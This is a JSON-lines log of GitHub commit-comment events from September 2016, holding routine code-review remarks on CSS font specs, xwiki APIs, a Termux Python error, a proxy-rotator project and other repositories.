{"id":"4573207383","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051855,"position":95,"line":95,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T10:07:52Z","updated_at":"2016-09-16T10:07:52Z","body":"separate logical blocks https://github.com/airbnb/javascript#whitespace--after-blocks"}},"created_at":"2016-09-16T10:07:52Z"}
{"id":"4573209010","type":"CommitCommentEvent","actor":{"login":"schmidtw"},"repo":{"name":"shilpa24balaji/wrp-c"},"payload":{"comment":{"id":19051865,"position":null,"line":null,"path":null,"commit_id":"a5692b231be46ffd455911134b1fc612d383a87c","created_at":"2016-09-16T10:08:15Z","updated_at":"2016-09-16T10:08:15Z","body":"Changes look good!"}},"created_at":"2016-09-16T10:08:15Z"}
{"id":"4573209804","type":"CommitCommentEvent","actor":{"login":"micafer"},"repo":{"name":"grycap/clues"},"payload":{"comment":{"id":19051868,"position":60,"line":312,"path":"cluesplugins/im.py","commit_id":"194637e885ef4256ebf2fb64887bd85f7c1f0414","created_at":"2016-09-16T10:08:26Z","updated_at":"2016-09-16T10:08:26Z","body":"As in this case radl_dat is not needed. You can change this part of the code to avoid calling self._get_radl(nname) in case of ec3_reuse_nodes."}},"created_at":"2016-09-16T10:08:26Z"}
{"id":"4573213837","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051878,"position":null,"line":null,"path":null,"commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T10:09:24Z","updated_at":"2016-09-16T10:09:24Z","body":"Are you sure you can't just use https://github.com/nodejitsu/node-http-proxy ?"}},"created_at":"2016-09-16T10:09:24Z"}
{"id":"4573217353","type":"CommitCommentEvent","actor":{"login":"micafer"},"repo":{"name":"grycap/clues"},"payload":{"comment":{"id":19051886,"position":107,"line":357,"path":"cluesplugins/im.py","commit_id":"194637e885ef4256ebf2fb64887bd85f7c1f0414","created_at":"2016-09-16T10:10:14Z","updated_at":"2016-09-16T10:10:14Z","body":"Change \"deleted\" by stopped."}},"created_at":"2016-09-16T10:10:14Z"}
{"id":"4573217776","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051889,"position":1,"line":1,"path":"Dockerfile","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T10:10:17Z","updated_at":"2016-09-16T10:10:17Z","body":"Is it good? :)"}},"created_at":"2016-09-16T10:10:17Z"}
{"id":"4573226236","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19051912,"position":null,"line":null,"path":null,"commit_id":"cd6866c1556ac05f0a24138093dd831e751caa75","created_at":"2016-09-16T10:12:14Z","updated_at":"2016-09-16T10:12:14Z","body":"> According to this logic, all items from this chain should always drop\r\n\r\nNot really. Every quest is it's own beast. Blizzard often increases drop rate for quest items between patches, but some are intended to stay fluctuant.\r\n\r\nDrop rates in DB are taken from Wowhead, which also counts kills from people without the quest.\r\n\r\nIn the case of the blood (which is the only item whose assured drop rate is unclear in the comments):\r\n`\"name\":\"Doomwarder Captain\",\"react\":[-1,-1],\"type\":3,count:26720,outof:28676` ([source](view-source:http://web.archive.org/web/20100804012204/http://www.wowhead.com/item=6252)).\r\n\r\nThis is 100%."}},"created_at":"2016-09-16T10:12:14Z"}
{"id":"4573230183","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19051919,"position":10,"line":482,"path":"xwiki-platform-core/pom.xml","commit_id":"5cce9f2b0da8a9ac58d1ba07398352eb7ac82516","created_at":"2016-09-16T10:13:11Z","updated_at":"2016-09-16T10:13:11Z","body":"Again young api should be mentioned here."}},"created_at":"2016-09-16T10:13:11Z"}
{"id":"4573230798","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051923,"position":171,"line":797,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:13:20Z","updated_at":"2016-09-16T10:13:20Z","body":"There is some discussion about what to do with this:\r\n\r\nOption 0: Don't change the syntax at all, and let the browser figure out what to do based on the font's STAT table\r\nOption 1: What this patch does\r\nOption 2: normal | italic | oblique <number>?\r\nOption 3: Keep this property unchanged and add a new property: font-slant: normal | oblique | <number>"}},"created_at":"2016-09-16T10:13:20Z"}
{"id":"4573232060","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19051927,"position":16,"line":488,"path":"xwiki-platform-core/pom.xml","commit_id":"5cce9f2b0da8a9ac58d1ba07398352eb7ac82516","created_at":"2016-09-16T10:13:37Z","updated_at":"2016-09-16T10:13:37Z","body":"same here"}},"created_at":"2016-09-16T10:13:37Z"}
{"id":"4573233071","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051933,"position":null,"line":null,"path":null,"commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T10:13:53Z","updated_at":"2016-09-16T10:13:53Z","body":"Yep, I've tried node-http-proxy. It's not fitting all needs"}},"created_at":"2016-09-16T10:13:53Z"}
{"id":"4573236065","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051942,"position":216,"line":864,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:14:36Z","updated_at":"2016-09-16T10:14:36Z","body":"\"ital\""}},"created_at":"2016-09-16T10:14:36Z"}
{"id":"4573237672","type":"CommitCommentEvent","actor":{"login":"SmileOmsk"},"repo":{"name":"nevedimko/regions"},"payload":{"comment":{"id":19051945,"position":1,"line":1,"path":"README.md","commit_id":"cf19d9704627d767caeebd879f5fabcd4c8e52f6","created_at":"2016-09-16T10:14:58Z","updated_at":"2016-09-16T10:14:58Z","body":"Ололо!"}},"created_at":"2016-09-16T10:14:58Z"}
{"id":"4573238117","type":"CommitCommentEvent","actor":{"login":"SmileOmsk"},"repo":{"name":"nevedimko/regions"},"payload":{"comment":{"id":19051947,"position":2,"line":2,"path":"README.md","commit_id":"cf19d9704627d767caeebd879f5fabcd4c8e52f6","created_at":"2016-09-16T10:15:05Z","updated_at":"2016-09-16T10:15:05Z","body":"Лололо"}},"created_at":"2016-09-16T10:15:05Z"}
{"id":"4573246800","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19051963,"position":24,"line":51,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/request/CreateBandMB.java","commit_id":"9862967eb4e743ead436a16b43bbea56ae83a39e","created_at":"2016-09-16T10:17:12Z","updated_at":"2016-09-16T10:17:12Z","body":"You are complicating things.\r\nHave a look at this: http://stackoverflow.com/questions/7899518/jsf-redirect-to-page-and-remember-parameter-id-for-searching"}},"created_at":"2016-09-16T10:17:12Z"}
{"id":"4573247682","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051965,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:17:24Z","updated_at":"2016-09-16T10:17:24Z","body":"I think you're right about \"italics\" being a typographic boolean.\r\n\r\nAn @font-face block doesn't need to expose ranges because the font selection algorithm will choose the @font-face block with the closest value to the requested one."}},"created_at":"2016-09-16T10:17:24Z"}
{"id":"4573248709","type":"CommitCommentEvent","actor":{"login":"liberty-developer"},"repo":{"name":"liberty-developer/inputstream.mpd"},"payload":{"comment":{"id":19051969,"position":null,"line":null,"path":null,"commit_id":"1e2ffe3ae7e66b2990feec6c8ba37f927eb692ce","created_at":"2016-09-16T10:17:38Z","updated_at":"2016-09-16T10:17:38Z","body":"I investigated this issue, problem is that amazon seems to have increased the security level.\r\nDecrypt() call is not allowed anymore, only DecryptAndDecode().\r\n\r\nThis means that there is no chance anymore to use widevine for decrypting and kodi for decoding.\r\nThis would not work on rpis and odroids, so its an serious issue where I currently don't know what can be done.\r\n\r\nMaybe someone reads this and provide some tipps for this...."}},"created_at":"2016-09-16T10:17:38Z"}
{"id":"4573248715","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19051970,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-16T10:17:39Z","updated_at":"2016-09-16T10:17:39Z","body":"Thanks for \"helping\" me (making CM's frameworks/av work on AOSP)"}},"created_at":"2016-09-16T10:17:39Z"}
{"id":"4573249142","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051973,"position":null,"line":null,"path":null,"commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T10:17:45Z","updated_at":"2016-09-16T10:17:45Z","body":"And this is just a scratch, main goal - create a whole infrastructure, which will know when to rotate, detect block cases, work with proxy pools, tor proxy, and so on..."}},"created_at":"2016-09-16T10:17:45Z"}
{"id":"4573250133","type":"CommitCommentEvent","actor":{"login":"friederbluemle"},"repo":{"name":"clementine-player/Clementine"},"payload":{"comment":{"id":19051974,"position":null,"line":null,"path":null,"commit_id":"170c64cd8bef9df2ea88dd4f72eec641c250bcfd","created_at":"2016-09-16T10:17:58Z","updated_at":"2016-09-16T10:17:58Z","body":"Thanks"}},"created_at":"2016-09-16T10:17:58Z"}
{"id":"4573250766","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19051975,"position":10,"line":482,"path":"xwiki-platform-core/pom.xml","commit_id":"5cce9f2b0da8a9ac58d1ba07398352eb7ac82516","created_at":"2016-09-16T10:18:08Z","updated_at":"2016-09-16T10:18:08Z","body":"Reminder: we're not allowed to break APIs in general without a strong justification of why we consider it acceptable to break a public API. When it's unstable that provides us with a good justification and we're allowed to do this (that's the reason for &Unstable actually ;)). For non unstable, we usually need a discussion/agreement/vote to make sure we don't make a mistake."}},"created_at":"2016-09-16T10:18:08Z"}
{"id":"4573255773","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19051985,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-16T10:19:21Z","updated_at":"2016-09-16T10:19:21Z","body":"It's not yet completed. I am still working and porting patches (hawaii specific patches) "}},"created_at":"2016-09-16T10:19:21Z"}
{"id":"4573257170","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051987,"position":385,"line":2574,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:19:42Z","updated_at":"2016-09-16T10:19:42Z","body":"These rules are yucky because of the special processing for 400 and 500. Maybe there is a better way."}},"created_at":"2016-09-16T10:19:42Z"}
{"id":"4573259575","type":"CommitCommentEvent","actor":{"login":"ITASAPI"},"repo":{"name":"ITASAPI/ITASAPI-v2.7"},"payload":{"comment":{"id":19051991,"position":null,"line":null,"path":null,"commit_id":"6a03bb490858fde6387791736fc4aa0495a27d8e","created_at":"2016-09-16T10:20:17Z","updated_at":"2016-09-16T10:20:17Z","body":"__API Description file syntax error on line 2722__: base type 'MasterTradingEntityId' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-16T10:20:17Z"}
{"id":"4573261430","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051993,"position":195,"line":844,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:20:42Z","updated_at":"2016-09-16T10:20:42Z","body":"The OT says that turning italics on has a value of 1, not 500."}},"created_at":"2016-09-16T10:20:42Z"}
{"id":"4573261535","type":"CommitCommentEvent","actor":{"login":"Guts"},"repo":{"name":"isogeo/isogeo-plugin-qgis"},"payload":{"comment":{"id":19051994,"position":29,"line":29,"path":"modules/tools.py","commit_id":"3b940e7e0359d63b0ba70929494f718c201a1199","created_at":"2016-09-16T10:20:43Z","updated_at":"2016-09-16T10:20:43Z","body":"Python dateutil is included in QGIS standard distribution. You should use it to make your dev life simpler :)\r\n\r\n```python\r\nfrom dateutil.parser import parse as dtparse # to prevent conflicts\r\n\r\ntimestamp_sample = \"2016-04-15T18:21:08.7454873+00:00\"\r\ndatetime_py = dtparse(timestamp_sample)\r\ndate_full_litteral = dtparse(timestamp_sample).strftime(\"%a %d %B %Y (%Hh%M)\")\r\ndate_short = dtparse(timestamp_sample).strftime(\"%d/%m/%Y\")\r\n```\r\n\r\nTo prevent limits of digits fractions issues you can just take the 19 first element:\r\n```python\r\ndatetime_py = dtparse(timestamp_sample[:19])\r\n```\r\n\r\nIf you insist to keep an 3rd party independant dev, you can use strptime:\r\n```python\r\ndatetime.datetime.strptime(\"2008-08-12T12:20:30.656234Z\", \"%Y-%m-%dT%H:%M:%S.Z\")\r\n```"}},"created_at":"2016-09-16T10:20:43Z"}
{"id":"4573263101","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19051997,"position":197,"line":846,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:21:07Z","updated_at":"2016-09-16T10:21:07Z","body":"The OT spec says oblique values are between -90 and 90."}},"created_at":"2016-09-16T10:21:07Z"}
{"id":"4573266423","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052003,"position":347,"line":2534,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:21:54Z","updated_at":"2016-09-16T10:21:54Z","body":"The OT says that turning italics on has a value of 1, not 500.\r\n\r\nObliques are supposed to be between -90 and 90."}},"created_at":"2016-09-16T10:21:54Z"}
{"id":"4573266618","type":"CommitCommentEvent","actor":{"login":"Procrastoman"},"repo":{"name":"Procrastoman/Procrastoman.github.io"},"payload":{"comment":{"id":19052004,"position":null,"line":null,"path":null,"commit_id":"4588a80ee73e949e790fbe811c1582600c89c4eb","created_at":"2016-09-16T10:21:57Z","updated_at":"2016-09-16T10:21:57Z","body":"[test.pdf](https://github.com/Procrastoman/Procrastoman.github.io/files/476600/test.pdf)\r\n"}},"created_at":"2016-09-16T10:21:57Z"}
{"id":"4573268219","type":"CommitCommentEvent","actor":{"login":"tinydynamite00"},"repo":{"name":"termux/termux-packages"},"payload":{"comment":{"id":19052008,"position":null,"line":null,"path":null,"commit_id":"32ef012d3c5275f33ed388600ec9d1173dbe4311","created_at":"2016-09-16T10:22:21Z","updated_at":"2016-09-16T10:22:21Z","body":"Apt-upgrade Python results in error:\r\n\r\nCANNOT LINK EXECUTABLE: cannot find verneed/verdef for version index=2 referenced by symbol \"__sF\" at \"/data/data/com.termux/files/usr/bin/python\"\r\npage record for 0xb6f6204c was not found (block_size=64)\r\n\r\nI ran apt-get clean, uninstalled Python and ran apt-get autoclean removing associated pkgs - error persists after clean install of Python & dependencies after apt update.\r\n\r\nText of shell output: \r\n[python-install.txt](https://github.com/termux/termux-packages/files/476601/python-install.txt)\r\n"}},"created_at":"2016-09-16T10:22:21Z"}
{"id":"4573268225","type":"CommitCommentEvent","actor":{"login":"Procrastoman"},"repo":{"name":"Procrastoman/Procrastoman.github.io"},"payload":{"comment":{"id":19052009,"position":null,"line":null,"path":null,"commit_id":"4588a80ee73e949e790fbe811c1582600c89c4eb","created_at":"2016-09-16T10:22:21Z","updated_at":"2016-09-16T10:22:21Z","body":"Learning"}},"created_at":"2016-09-16T10:22:21Z"}
{"id":"4573271990","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052023,"position":143,"line":773,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:23:20Z","updated_at":"2016-09-16T10:23:20Z","body":"Values should be clamped at 0."}},"created_at":"2016-09-16T10:23:20Z"}
{"id":"4573272896","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"yairpatch/android_device_lge_g3-common"},"payload":{"comment":{"id":19052025,"position":null,"line":null,"path":null,"commit_id":"158caa12bc4d59e7e4f5b39ad3ae0ae6d243d95b","created_at":"2016-09-16T10:23:34Z","updated_at":"2016-09-16T10:23:34Z","body":"good job uploading these"}},"created_at":"2016-09-16T10:23:34Z"}
{"id":"4573274296","type":"CommitCommentEvent","actor":{"login":"stefanklein"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19052027,"position":null,"line":null,"path":null,"commit_id":"7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7","created_at":"2016-09-16T10:23:54Z","updated_at":"2016-09-16T10:23:54Z","body":"here some suggestions how to integrate checks for C++11 within the code. using the #error statement you can generate a meaningful compile error, even if the code is included by some other project.\r\n\r\nhttp://stackoverflow.com/questions/5047971/how-do-i-check-for-c11-support\r\n\r\nanyway, no need to spend too much time on it now.\r\n\r\nI don't have preference for any style in particular, up to you.\r\n\r\n\r\nOn 16-09-2016 12:04, Kasper Marstal wrote:\r\n\r\nThe error came up when building the command line interface as an external project. That is, if a user imports the SuperElastix use-file and tries to compile the project without having C++11 enabled, the error will be triggered. We cannot control what is in the user's repository. Of course I agree that we should check for C++ capability explicitly in CMake as well.\r\n\r\nStyle-wise I also prefer the space between brackets. What do you think?\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/kaspermarstal/SuperElastix/commit/7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7#commitcomment-19051817>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAultaVDFJFiXDD1xmUmfOCSXzHJbua5ks5qqmnAgaJpZM4J9t_Z>.\r\n\r\n\r\n--\r\nStefan Klein\r\n+31 10 7043442\r\nhttp://www.bigr.nl/people/StefanKlein\r\n"}},"created_at":"2016-09-16T10:23:54Z"}
{"id":"4573276943","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"AlejandroMagual/spicedacademy"},"payload":{"comment":{"id":19052038,"position":null,"line":null,"path":null,"commit_id":"0c7e6bbfa6e05b2a80863b45ca73497979759749","created_at":"2016-09-16T10:24:32Z","updated_at":"2016-09-16T10:24:32Z","body":"LGTM!"}},"created_at":"2016-09-16T10:24:32Z"}
{"id":"4573279091","type":"CommitCommentEvent","actor":{"login":"fornwall"},"repo":{"name":"termux/termux-packages"},"payload":{"comment":{"id":19052043,"position":null,"line":null,"path":null,"commit_id":"32ef012d3c5275f33ed388600ec9d1173dbe4311","created_at":"2016-09-16T10:25:05Z","updated_at":"2016-09-16T10:25:05Z","body":"Thanks, I'm looking into it!"}},"created_at":"2016-09-16T10:25:05Z"}
{"id":"4573279491","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"AlejandroMagual/spicedacademy"},"payload":{"comment":{"id":19052044,"position":1,"line":1,"path":"wk3/Day4/Excercise2/Excercise2.js","commit_id":"9a31756c6760d48facb5e824df5f901222c586e6","created_at":"2016-09-16T10:25:11Z","updated_at":"2016-09-16T10:25:11Z","body":"nitpick: this function isn't validating text, it's validationg JSON :)"}},"created_at":"2016-09-16T10:25:11Z"}
{"id":"4573280863","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"AlejandroMagual/spicedacademy"},"payload":{"comment":{"id":19052049,"position":null,"line":null,"path":null,"commit_id":"9a31756c6760d48facb5e824df5f901222c586e6","created_at":"2016-09-16T10:25:30Z","updated_at":"2016-09-16T10:25:30Z","body":"LGTM."}},"created_at":"2016-09-16T10:25:30Z"}
{"id":"4573282228","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052052,"position":71,"line":685,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:25:51Z","updated_at":"2016-09-16T10:25:51Z","body":"Rather than being halfway between existing values, the step locations may benefit from being located just before / after the existing values."}},"created_at":"2016-09-16T10:25:51Z"}
{"id":"4573284835","type":"CommitCommentEvent","actor":{"login":"Jeanhwea"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":19052057,"position":null,"line":null,"path":null,"commit_id":"bb76f24af2010943387ce696a7092175b4ecccf2","created_at":"2016-09-16T10:26:31Z","updated_at":"2016-09-16T10:26:31Z","body":"oh my vim, 8.0"}},"created_at":"2016-09-16T10:26:31Z"}
{"id":"4573287999","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052059,"position":451,"line":4419,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:27:20Z","updated_at":"2016-09-16T10:27:20Z","body":"I forgot where to apply font-optical-size in this sequence."}},"created_at":"2016-09-16T10:27:20Z"}
{"id":"4573292304","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052069,"position":7,"line":563,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:28:28Z","updated_at":"2016-09-16T10:28:28Z","body":"This needs to match the font-weight @font-face descriptor."}},"created_at":"2016-09-16T10:28:28Z"}
{"id":"4573293211","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052073,"position":86,"line":712,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:28:41Z","updated_at":"2016-09-16T10:28:41Z","body":"This needs to match the font-stretch @font-face descriptor."}},"created_at":"2016-09-16T10:28:41Z"}
{"id":"4573294862","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052078,"position":171,"line":797,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:29:08Z","updated_at":"2016-09-16T10:29:08Z","body":"This needs to match the font-style @font-face descriptor."}},"created_at":"2016-09-16T10:29:08Z"}
{"id":"4573296103","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19052082,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-16T10:29:27Z","updated_at":"2016-09-16T10:29:27Z","body":"WadaPav ftw"}},"created_at":"2016-09-16T10:29:27Z"}
{"id":"4573299723","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052089,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:30:19Z","updated_at":"2016-09-16T10:30:19Z","body":"I need to add more examples. John Daggett made some pretty amazing ones, I should just drop them in ❤️"}},"created_at":"2016-09-16T10:30:19Z"}
{"id":"4573304271","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19052097,"position":68,"line":1033,"path":"runtime/src/main/jni/CallbackHandlers.cpp","commit_id":"7f135764cad7fa6441028d380f8f7fa522947197","created_at":"2016-09-16T10:31:24Z","updated_at":"2016-09-16T10:31:24Z","body":"no need for `->ToString()` at the end"}},"created_at":"2016-09-16T10:31:24Z"}
{"id":"4573304359","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19052098,"position":234,"line":1710,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T10:31:25Z","updated_at":"2016-09-16T10:31:25Z","body":"Another option is to have an optional second argument to format()."}},"created_at":"2016-09-16T10:31:25Z"}
{"id":"4573304453","type":"CommitCommentEvent","actor":{"login":"vindzhev"},"repo":{"name":"rndsolutions/hawkcd.io"},"payload":{"comment":{"id":19052099,"position":null,"line":null,"path":null,"commit_id":"6f5cfadde87cf8593d9a954fe3ef37ddb1833d2f","created_at":"2016-09-16T10:31:27Z","updated_at":"2016-09-16T10:31:27Z","body":"Misspelled '_coross_' and '_developoed_' . '_It_' should be lowercase or there should be a full stop before it. 'I' on '_WIndows_' must be lowercase and there must be 'or' before '_OS X_'. Missed comma after '_build_' and before '_test_'. "}},"created_at":"2016-09-16T10:31:27Z"}
{"id":"4573305377","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19052102,"position":35,"line":971,"path":"runtime/src/main/jni/CallbackHandlers.cpp","commit_id":"7f135764cad7fa6441028d380f8f7fa522947197","created_at":"2016-09-16T10:31:41Z","updated_at":"2016-09-16T10:31:41Z","body":"no need for `->ToString()` at the end"}},"created_at":"2016-09-16T10:31:41Z"}
{"id":"4573309394","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19052114,"position":null,"line":null,"path":null,"commit_id":"239cdcdf8af5bf669f975db81f80320f8373ee4c","created_at":"2016-09-16T10:32:42Z","updated_at":"2016-09-16T10:32:42Z","body":":+1: "}},"created_at":"2016-09-16T10:32:42Z"}
{"id":"4573316278","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":19052124,"position":27,"line":27,"path":"wk3/json1.js","commit_id":"1dff474d971eabb1fde548179d3aebbb3760cd74","created_at":"2016-09-16T10:34:25Z","updated_at":"2016-09-16T10:34:25Z","body":"this doesn't work as expected. when I enter a correct number, I get re-prompted. When I enter a letter, the prompt disappears..."}},"created_at":"2016-09-16T10:34:25Z"}
{"id":"4573317616","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":19052128,"position":18,"line":18,"path":"wk3/json2.js","commit_id":"1dff474d971eabb1fde548179d3aebbb3760cd74","created_at":"2016-09-16T10:34:46Z","updated_at":"2016-09-16T10:34:46Z","body":"LGTM!"}},"created_at":"2016-09-16T10:34:46Z"}
{"id":"4573318659","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19052133,"position":10,"line":482,"path":"xwiki-platform-core/pom.xml","commit_id":"5cce9f2b0da8a9ac58d1ba07398352eb7ac82516","created_at":"2016-09-16T10:35:03Z","updated_at":"2016-09-16T10:35:03Z","body":"Note that nothing is broken at runtime. The implementation of this API still don't throw any exception, it just declares it. The breakage is only at build time which is less important."}},"created_at":"2016-09-16T10:35:03Z"}
{"id":"4573319367","type":"CommitCommentEvent","actor":{"login":"NHGRisk"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":19052134,"position":null,"line":null,"path":null,"commit_id":"2cdf31a1ede27dad6b55083d4ba0a52935acc591","created_at":"2016-09-16T10:35:14Z","updated_at":"2016-09-16T10:35:14Z","body":"thats the thing i meant :D"}},"created_at":"2016-09-16T10:35:14Z"}
{"id":"4573324178","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19052150,"position":7,"line":253,"path":"src/utils/polygon.h","commit_id":"72e4bf8069f50ab8b4e11552d5eac29424bfda88","created_at":"2016-09-16T10:36:28Z","updated_at":"2016-09-16T10:36:28Z","body":"Ok I will try to keep low on the maximal\r\nYou're right"}},"created_at":"2016-09-16T10:36:28Z"}
{"id":"4573325009","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19052152,"position":null,"line":null,"path":null,"commit_id":"347ba479137d06c6f8055083266522a13d410b64","created_at":"2016-09-16T10:36:40Z","updated_at":"2016-09-16T10:36:40Z","body":"Fixes #3"}},"created_at":"2016-09-16T10:36:40Z"}
{"id":"4573325293","type":"CommitCommentEvent","actor":{"login":"Zuldan"},"repo":{"name":"PowerShell/xStorage"},"payload":{"comment":{"id":19052154,"position":null,"line":null,"path":null,"commit_id":"8dd161665865a98e7109be3f5529a8427c4c5a39","created_at":"2016-09-16T10:36:45Z","updated_at":"2016-09-16T10:36:45Z","body":"@gigi81 thank you very much for this fix. Would it be possible to update README.md Unreleased section with this bug fix as well?"}},"created_at":"2016-09-16T10:36:45Z"}
